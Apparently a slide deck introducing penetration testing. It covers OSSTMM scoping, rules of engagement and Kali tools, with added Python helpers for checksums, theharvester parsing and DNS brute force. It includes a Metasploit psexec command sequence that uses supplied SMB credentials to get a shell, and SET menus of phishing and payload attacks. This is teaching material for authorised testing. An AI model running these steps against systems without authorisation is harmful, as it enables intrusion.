Wilkinson Technology Introduction to Penetration Testing Paul D. Robertson paul@wilkitech.com @compuwar
Speaker Bio Paul D. Robertson Chief Technology Officer and Chief Information Security Officer Wilkinson Technology Services www.wilkitech.com
Penetration Testing - Definition NIST SP 800-115 - Technical Guide to Information Security Testing and Assessment: Security testing in which evaluators mimic real-world attacks in an attempt to identify ways to circumvent the security features of an application, system, or network. Penetration testing often involves issuing real attacks on real systems and data, using the same tools and techniques used by actual attackers. Most penetration tests involve looking for combinations of vulnerabilities on a single system or multiple systems that can be used to gain more access than could be achieved through a single vulnerability.
Caveats Know the legality of what you're doing before you do it. Get permission, in writing. Just being able to run canned tools isn't usually enough. Worry about 3rd parties (shared hosting, upstream providers, anything you did not get permission to touch). Always test your tools in a controlled environment first. Insurance is a good thing. Evolve.
OSSTMM Open Source Security Testing Methodology Manual One of many methodologies - none of them canonical Good place to find all the boring stuff and confusing terms
Defining A Security Test 1. Define what you want to protect. These are the assets. The protection mechanisms for these assets are the Controls you will test to identify Limitations. 2. Identify the area around the assets which includes the protection mechanisms and the processes or services built around the assets. This is where interaction with assets will take place. This is your engagement zone.
Defining A Security Test 3. Define everything outside the engagement zone that you need to keep your assets operational. This may include things you may not be able to directly influence like electricity, food, water, air, stable ground, information, legislation, regulations and things you may be able to work with like dryness, warmth, coolness, clarity, contractors, colleagues, branding, partnerships, and so on. Also count that which keeps the infrastructure operational like processes, protocols, and continued resources. This is your test scope.
Defining A Security Test (Cont.) 4. Define how your scope interacts within itself and with the outside. Logically compartmentalize the assets within the scope through the direction of interactions such as inside to outside, outside to inside, inside to inside, department A to department B, etc. These are your vectors. Each vector should ideally be a separate test to keep each compartmentalized test duration short before too much change can occur within the environment.
Defining A Security Test (Cont.) 5. Identify what equipment will be needed for each test. Inside each vector, interactions may occur on various levels. These levels may be classified in many ways, however here they have been classified by function as five channels. The channels are Human, Physical, Wireless, Telecommunications, and Data Networks. Each channel must be separately tested for each vector.
Defining A Security Test (Cont.) 6. Determine what information you want to learn from the test. Will you be testing interactions with the assets or also the response from active security measures? The test type must be individually defined for each test, however there are six common types identified here as Blind, Double Blind, Gray Box, Double Gray Box, Tandem, and Reversal.
Defining A Security Test (Cont.) 7. Assure the security test you have defined is in compliance with the Rules of Engagement, a guideline to assure the process for a proper security test without creating misunderstandings, misconceptions, or false expectations.
Scope The scope is the total possible operating security environment for any interaction with any asset which may include the physical components of security measures as well. The scope is comprised of three classes of which there are five channels: Telecommunications and Data Networks security Channels of the COMSEC class, Physical and Human Security Channels of the PHYSSEC class, and the full spectrum Wireless Security Channel of the SPECSEC class.
Scope Classes are used to define an area of study, investigation, or operation. However, Channels are the specific means of interacting with assets. An asset can be anything that has value to the owner. Assets can be physical property like gold, people, blueprints, laptops, the typical 900 MHz frequency phone signal, and money; or intellectual property such as personnel data, a relationship, a brand, business processes, passwords, and something which is said over the 900 MHz phone signal.
Scope (Cont.) It must be made clear that a security analysis must be restricted to that which is within a type of certainty (not to be confused with risk, which is not a certainty but a probability). These restrictions include: 1. Non-events such as a volcano eruption where no volcano exists 2. Non-impact like moonlight through a data center window 3. Global-impacting such as a catastrophic meteor impact. While a thorough security audit requires testing all five channels, realistically, tests are conducted and categorized by the required expertise of the Analyst and the required equipment for the audit.
Scope (Cont.) Classes: Physical Security (PHYSSEC) Spectrum Security (SPECSEC) Communications Security (COMSEC)
Scope (Cont.) Physical Security Channels Human: Comprises the human element of communication where interaction is either physical or psychological. Physical: Physical security testing where the channel is both physical and non-electronic in nature. Comprises the tangible element of security where interaction requires physical effort or an energy transmitter to manipulate.
Scope (Cont.) Spectrum Security Channel Wireless: Comprises all electronic communications, signals, and emanations which take place over the known EM spectrum. This includes ELSEC as electronic communications, SIGSEC as signals, and EMSEC which are emanations untethered by cables.
Common Test Types Blind: No prior target knowledge. Double Blind: No prior target knowledge and no target notification. Gray Box: Limited target knowledge. Double Gray Box: Limited target knowledge, target knows the timeframe of the test. Tandem: Full information on both sides. Reversal: Full information for the attacker, no information for the defenders.
Rules of Engagement What's in scope? What's allowed? NDAs, contracts, get-out-of-jail-free cards (signed authorization you carry with you). Required reporting elements. Reporting channels (who gets told what, and how, if you find something critical mid-test).
Testing Passive information collection Active information collection Actively test assets
Tools Toolbox Test Environment
Test Environment MSDN/TechNet licenses for target OS images Virtual/Physical Test Software Revisions! Keep old versions! (You need the vulnerable release to reproduce a finding.)
Toolbox Kali Linux is the main tool we'll be discussing Replacement for BackTrack Linux Designed for pentesting Debian-based
Kali Linux Lives at http://www.kali.org Actual repository at http.kali.org
Kali Linux Check your checksum after downloading! Linux: sha1sum OS X: shasum Validate the SHA1SUMS file with GPG - it's in the docs (next slide); the checksum alone only proves the download is intact, the signature proves it came from Kali Can run live from DVD or USB or install in a VM or on hardware Can add persistence to USB installs Dual boot isn't always trivial, neither is EFI boot If you run in a VM, you need a USB-based wireless adapter to attack wireless networks Kernels are already patched for wireless injection ARM versions available
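The checksum step above, as an added example (not code from the Kali project or its docs): it recomputes the SHA-1 of a downloaded file and compares it to the entry for that filename in a sha1sum-format SHA1SUMS file. The image and sums file are constructed on the fly so it runs offline; the filenames kali-linux-demo.iso and kali-linux-other.iso are placeholders. The GPG check of SHA1SUMS itself is a separate step and is not performed here.

```python
"""Verify a downloaded image against a SHA1SUMS-style checksum file.

Added example, not code from the Kali project: `verify_checksum` streams the
file through SHA-1 and compares the digest with the entry for that filename
in a sums file laid out like `sha1sum` output ("<hex>  <name>" per line).
The image and sums file are constructed on the fly so this runs offline;
for a real download point it at the ISO and SHA1SUMS, and still verify the
SHA1SUMS.gpg signature as the Kali docs describe.
"""
import hashlib
import hmac
import os
import tempfile


def sha1_of_file(path, chunk_size=1 << 20):
    """Hash in 1 MiB chunks so a multi-GB image never has to fit in memory."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def parse_sums_file(path):
    """Return {filename: hexdigest} from a sha1sum-format file."""
    expected = {}
    with open(path) as f:
        for line in f:
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            digest, _, name = line.partition("  ")
            # sha1sum prefixes binary-mode entries with '*'
            expected[name.lstrip("*")] = digest.lower()
    return expected


def verify_checksum(image_path, sums_path):
    """True only if the sums file lists this filename AND the digest matches.

    An unlisted filename is a failure, not an unknown: a renamed or substituted
    image must not pass just because nothing contradicts it.
    """
    expected = parse_sums_file(sums_path)
    name = os.path.basename(image_path)
    if name not in expected:
        return False
    return hmac.compare_digest(sha1_of_file(image_path), expected[name])


def build_demo(directory):
    """Constructed sample: a small stand-in 'image' and a matching sums file."""
    image = os.path.join(directory, "kali-linux-demo.iso")
    with open(image, "wb") as f:
        f.write(b"constructed demo bytes, not a real ISO\n" * 1000)
    sums = os.path.join(directory, "SHA1SUMS")
    with open(sums, "w") as f:
        f.write("%s  %s\n" % (sha1_of_file(image), os.path.basename(image)))
        f.write("%s  kali-linux-other.iso\n" % ("0" * 40))   # placeholder entry
    return image, sums


def run_demo():
    """Verify the sample, then tamper with it and verify again.

    Returns (clean_ok, tampered_ok, unlisted_ok) = (True, False, False).
    """
    with tempfile.TemporaryDirectory() as d:
        image, sums = build_demo(d)
        clean_ok = verify_checksum(image, sums)
        with open(image, "ab") as f:
            f.write(b"\x00")              # simulate a corrupted or modified download
        tampered_ok = verify_checksum(image, sums)
        unlisted_ok = verify_checksum(sums, sums)   # SHA1SUMS is not listed in itself
    return clean_ok, tampered_ok, unlisted_ok


if __name__ == "__main__":
    print("clean, tampered, unlisted:", run_demo())
```

The comparison uses hmac.compare_digest rather than == out of habit; for a public checksum it makes no security difference, but it keeps the same helper usable for comparing secret values later.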
Kali Linux RTFM! http://docs.kali.org http://docs.kali.org/pdf/kali-book-en.pdf http://forums.kali.org irc.freenode.net #kali-linux
Kali Linux Caveats: Not really designed for complete newbies Updates routinely break things- snapshot VMs Use pass-through, not NAT for VMs There are more than 300 tools in the distribution- You won t always find information for them all You will be running as root all the time.
Kali Linux Relatively easy to build your own custom version, from within a running Kali install. Unlike BackTrack, everything is filesystem standard - no more of that /pentest stuff! Command help is sometimes off a bit - just use the command directly, it's in the path.
Kali Linux Good Targets: https://www.pentesterlab.com/ http://vulnhub.com/
theharvester Applications->Kali Linux->Information Gathering->OSINT Analysis The built-in usage example is wrong for Kali - no need for ./ or .py, the command is in the path: theharvester -d targetdomain -b google -l 500 theharvester -d targetdomain -b linkedin Using -b all will sometimes give strange results Can redirect output to a file
theharvester theharvester -d mydomain.foo -b all [+] Emails found: ----------------------- paul@mydomain.foo info@mydomain.foo
theharvester theharvester -d mydomain.foo -b all [+] Hosts found in search engines: --------------------------------------------- 127.0.0.110:www.mydomain.foo 127.0.0.110:dns1.mydomain.foo 127.0.0.22:dns2.mydomain.foo 127.10.0.110:www.mydomain.foo [+] Virtual hosts ---------------------- 127.0.0.110 otherdomain.bar 127.0.0.110 yetanother.baz 127.0.0.110 otherdomain.baz 127.0.0.110 www.mydomain.foo (the virtual hosts section shows other people's domains on the same IP - a 3rd-party caveat for scoping)
theharvester I have found that theharvester finds things in Google that the Metasploit auxiliary/gather/search_email_collector
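The theharvester output shown on the previous slides is easier to scope from once it is parsed. The following is an added example, not part of theharvester: it reads the tool's "[+] Emails found", "[+] Hosts found in search engines" and "[+] Virtual hosts" sections from captured stdout, de-duplicates the emails, maps hostnames to IPs and IPs to virtual hosts, and then flags IPs that also serve names outside the target domain (probable shared hosting, i.e. the 3rd-party caveat). SAMPLE_OUTPUT is a constructed copy of the slide output; mydomain.foo and the 127.x addresses are placeholders.

```python
"""Turn theharvester's text report into something you can scope from.

Added example, not part of theharvester: `parse_harvester` reads the
"[+] Emails found", "[+] Hosts found in search engines" and "[+] Virtual hosts"
sections of the tool's output (captured with something like
`theharvester -d mydomain.foo -b all > harvest.txt`) and returns de-duplicated
emails, a hostname -> IPs map and an IP -> vhosts map. `shared_hosts` then
flags IPs that also answer for names outside the target domain, i.e. hosting
that is probably shared with third parties. SAMPLE_OUTPUT is a constructed
copy of the slide output, with mydomain.foo as the placeholder domain.
"""
import re
from collections import defaultdict

SAMPLE_OUTPUT = """\
[+] Emails found:
-----------------------
paul@mydomain.foo
Paul@mydomain.foo
info@mydomain.foo

[+] Hosts found in search engines:
---------------------------------------------
127.0.0.110:www.mydomain.foo
127.0.0.110:dns1.mydomain.foo
127.0.0.22:dns2.mydomain.foo
127.10.0.110:www.mydomain.foo

[+] Virtual hosts
----------------------
127.0.0.110 otherdomain.bar
127.0.0.110 yetanother.baz
127.0.0.110 otherdomain.baz
127.0.0.110 www.mydomain.foo
"""

SECTION_RE = re.compile(r"^\[\+\]\s*(.+?):?\s*$")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def parse_harvester(text):
    """Parse the three report sections; unknown sections are ignored."""
    emails = set()
    hosts = defaultdict(set)    # hostname -> {ip}
    vhosts = defaultdict(set)   # ip -> {vhost}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or set(line) == {"-"}:        # blank or '-----' separator
            continue
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1).lower()
            continue
        if section is None:
            continue
        if section.startswith("emails"):
            if "@" in line:
                emails.add(line.lower())
        elif section.startswith("hosts"):
            ip, sep, host = line.partition(":")   # printed as ip:hostname
            if sep and IPV4_RE.match(ip):
                hosts[host.lower()].add(ip)
        elif section.startswith("virtual"):
            parts = line.split()                  # printed as "ip hostname"
            if len(parts) == 2 and IPV4_RE.match(parts[0]):
                vhosts[parts[0]].add(parts[1].lower())
    return {
        "emails": sorted(emails),
        "hosts": {h: sorted(ips) for h, ips in hosts.items()},
        "vhosts": {ip: sorted(names) for ip, names in vhosts.items()},
    }


def shared_hosts(parsed, domain):
    """IPs whose vhosts include names outside `domain`: likely shared hosting.

    Treat these with care: an attack on the IP hits every tenant, not only
    the one that signed your rules of engagement.
    """
    domain = domain.lower()
    shared = {}
    for ip, names in parsed["vhosts"].items():
        foreign = [n for n in names if n != domain and not n.endswith("." + domain)]
        if foreign:
            shared[ip] = foreign
    return shared


if __name__ == "__main__":
    report = parse_harvester(SAMPLE_OUTPUT)
    print("emails:", report["emails"])
    print("hosts:", report["hosts"])
    print("shared IPs:", shared_hosts(report, "mydomain.foo"))
```

Feed the hosts map into the DNS and scanning steps, and get the shared-IP list in front of the client before anything active is run against those addresses.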
DNS dnsrecon -d mydomain dnsenum mydomain Both allow a wordlist to enumerate potential hostnames (dnsrecon -t brt -D wordlist, dnsenum -f wordlist). Wordlists live in /usr/share/wordlists rockyou is gzipped Can also use Metasploit
DNS In Metasploit use auxiliary/gather/enum_dns (msfconsole `set` takes no '=' sign):
use auxiliary/gather/enum_dns
set DOMAIN mydomain
set ENUM_BRT true
set WORDLIST /opt/metasploit/apps/pro/msf3/data/wordlists/namelist.txt
set ENUM_AXFR false
run
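What the wordlist options above actually do, as an added example (this is not dnsrecon, dnsenum or Metasploit's enum_dns code): each candidate label is prepended to the domain and resolved, and anything that answers is a host. The example adds the check the slides do not mention: probing random labels first, because a zone with a wildcard record answers for every word and the run would otherwise report the whole wordlist as hosts. Resolution goes through a caller-supplied resolve() function so the script runs offline against constructed zones; FAKE_ZONE, WILDCARD_ZONE, SAMPLE_WORDS, mydomain.foo and wild.foo are all placeholders.

```python
"""Wordlist hostname enumeration with a wildcard check.

Added example; this is not dnsrecon, dnsenum or Metasploit's enum_dns, but
it is the loop those tools run when given a wordlist (dnsrecon -D, ENUM_BRT).
Resolution goes through a caller-supplied `resolve(name) -> [ip, ...]`
function so the script runs offline against the constructed FAKE_ZONE and
WILDCARD_ZONE dicts; for a real target pass a function wrapping
socket.gethostbyname_ex or dnspython. mydomain.foo and wild.foo are
placeholder domains and the addresses are made up.
"""
import random
import string

# Constructed sample zones (placeholder domains, not real records).
FAKE_ZONE = {
    "www.mydomain.foo": ["127.0.0.110"],
    "dns1.mydomain.foo": ["127.0.0.110"],
    "dns2.mydomain.foo": ["127.0.0.22"],
    "mail.mydomain.foo": ["127.0.0.25"],
    "dev.mydomain.foo": ["10.0.0.5"],
}
WILDCARD_ZONE = {"www.wild.foo": ["192.0.2.10"], "mail.wild.foo": ["192.0.2.25"]}
# Constructed stand-in for a namelist; blank lines and comments are skipped.
SAMPLE_WORDS = ["www", "mail", "ftp", "dev", "dns1", "dns2", "vpn", "# comment", ""]


def fake_resolver(zone, wildcard=None):
    """Build resolve() from a dict; `wildcard=(domain, ips)` answers for any other name under it."""
    def resolve(name):
        name = name.lower().rstrip(".")
        if name in zone:
            return list(zone[name])
        if wildcard and name.endswith("." + wildcard[0]):
            return list(wildcard[1])
        return []
    return resolve


def wildcard_ips(domain, resolve, probes=3, length=12):
    """Resolve random labels; any answer means a catch-all record exists.

    Returns the set of IPs the wildcard answers with (empty set if none).
    Several probes are used because a round-robin wildcard rotates addresses.
    """
    seen = set()
    for _ in range(probes):
        label = "".join(random.choice(string.ascii_lowercase) for _ in range(length))
        ips = resolve(label + "." + domain)
        if not ips:
            return set()          # a random name did not resolve: no wildcard
        seen.update(ips)
    return seen


def brute_force(domain, words, resolve):
    """Return ({hostname: [ips]}, sorted wildcard ips) for every word that resolves.

    When a wildcard exists, a hit that only returns wildcard addresses is
    discarded; only names with a different answer are reported as real hosts.
    """
    wildcard = wildcard_ips(domain, resolve)
    found = {}
    for word in words:
        word = word.strip().lower()
        if not word or word.startswith("#"):
            continue
        name = word + "." + domain
        ips = resolve(name)
        if not ips:
            continue
        if wildcard and set(ips) <= wildcard:
            continue
        found[name] = sorted(ips)
    return found, sorted(wildcard)


def load_wordlist(path):
    """Read one candidate label per line, e.g. a list from /usr/share/wordlists."""
    with open(path) as f:
        return [line.strip() for line in f if line.strip()]


if __name__ == "__main__":
    print(brute_force("mydomain.foo", SAMPLE_WORDS, fake_resolver(FAKE_ZONE)))
    wild = fake_resolver(WILDCARD_ZONE, wildcard=("wild.foo", ["192.0.2.10"]))
    print(brute_force("wild.foo", SAMPLE_WORDS, wild))
```

Against wild.foo only mail.wild.foo is reported, because it is the one name whose answer differs from the wildcard address; a tool without the probe would list every word in the file.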
OpenVAS Good (not great) vulnerability scanner Forked from Nessus before everything went commercial Run the setup first to set the admin password and start the engines GSD (Greenbone Security Desktop) is difficult to navigate - use GSA (Greenbone Security Assistant, the web UI) if you can Use domain credentials if you can (authenticated scans find far more) and filter for high and medium vulns Run openvas-nvt-sync before starting up each time so the plugin feed is current
SET se-toolkit main menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
SET se-toolkit -> 1) Social-Engineering Attacks:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
Fern Wi-Fi Cracker GUI tool WPA, WPA2 and WEP Wordlists supported
Metasploit Start the database and service, then the console:
service postgresql start
service metasploit start
msfconsole
Metasploit Example: authenticate to SMB with known credentials and get a shell via psexec
use exploit/windows/smb/psexec
set LHOST 10.0.0.1
set RHOST 10.0.0.127
set SMBUser victim
set SMBPass password
exploit
Teensy 3.0
Teensy 3.0 $20.00 Can act as a USB HID (keyboard) Add Teensyduino to the Arduino IDE to load sketches Commonly presents itself as an Apple USB keyboard, which is accepted without prompting by Windows, OS X and most GUI Linuxes
Kautilya http://code.google.com/kautilya Contains many Teensy payloads
Demo Time Assuming everything works
Wilkinson Technology Wilkitech paul@wilkitech.com